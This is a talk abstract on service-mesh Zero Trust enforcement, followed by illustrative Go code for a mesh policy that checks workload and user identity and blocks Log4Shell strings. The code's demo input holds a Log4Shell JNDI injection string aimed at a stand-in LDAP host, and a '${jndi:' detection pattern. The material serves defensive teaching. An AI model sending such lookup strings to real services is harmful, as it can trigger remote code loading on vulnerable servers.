In this talk given at the
Zero Trust Architecture and DevSecOps for Cloud-Native Applications
conference held at NIST, I demonstrate how a Service Mesh can be used as a Security
Kernel to implement Zero Trust platforms. We will see how distributed enforcement points can apply policy to the user identity, how runtime (workload) identity can be enforced as well, and how application-targeted policies can be created to quickly mitigate vulnerabilities such as Log4Shell.
The demo also shows the development of custom WASM-based policies that can use the entire feature set of the programming language of choice to build rich access policies enforced by the mesh.
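The three checks named above (runtime identity, user identity and an application-targeted mitigation) collapse into one decision function in a custom policy. The Go code below is an added illustration of that decision logic, not code from the talk or from any mesh project; the `Request` view, the SPIFFE ID, the `${jndi:` fragment and the proxy-side plumbing that would feed it are assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Request is a constructed view of what the sidecar hands the policy.
type Request struct {
	PeerIdentity  string            // runtime identity from the mTLS peer certificate
	UserPrincipal string            // user identity from a verified JWT; empty if none
	Headers       map[string]string // HTTP request headers
}
// Policy combines runtime identity, user identity and an application-targeted mitigation.
type Policy struct {
	AllowedPeers           map[string]bool // SPIFFE IDs allowed to call this workload
	RequireUser            bool            // deny requests without an authenticated user
	BlockedHeaderFragments []string        // lowercase substrings that deny the request
}
// Evaluate scans every header, since Log4Shell fired on any logged attacker-controlled string.
func (p Policy) Evaluate(r Request) (bool, string) {
	if !p.AllowedPeers[r.PeerIdentity] {
		return false, "peer identity not allowed: " + r.PeerIdentity
	}
	if p.RequireUser && r.UserPrincipal == "" {
		return false, "no authenticated user principal"
	}
	for name, value := range r.Headers {
		for _, frag := range p.BlockedHeaderFragments {
			if strings.Contains(strings.ToLower(value), frag) {
				return false, "blocked fragment in header " + name
			}
		}
	}
	return true, "ok"
}
// Log4ShellMitigation is the constructed demo policy. A substring match catches only the
// plain lookup string; obfuscated variants need the richer parsing a WASM module can do.
func Log4ShellMitigation() Policy {
	return Policy{
		AllowedPeers:           map[string]bool{"spiffe://cluster.local/ns/shop/sa/frontend": true},
		RequireUser:            true,
		BlockedHeaderFragments: []string{"${jndi:"},
	}
}

func main() {
	fmt.Println(Log4ShellMitigation().Evaluate(Request{PeerIdentity: "spiffe://cluster.local/ns/shop/sa/frontend",
		UserPrincipal: "alice", Headers: map[string]string{"User-Agent": "${jndi:ldap://example.invalid/a}"}}))
}
```

In a real deployment the peer identity and user principal come from the mesh's mTLS and JWT validation; a policy should never trust values the caller can set in headers for these fields.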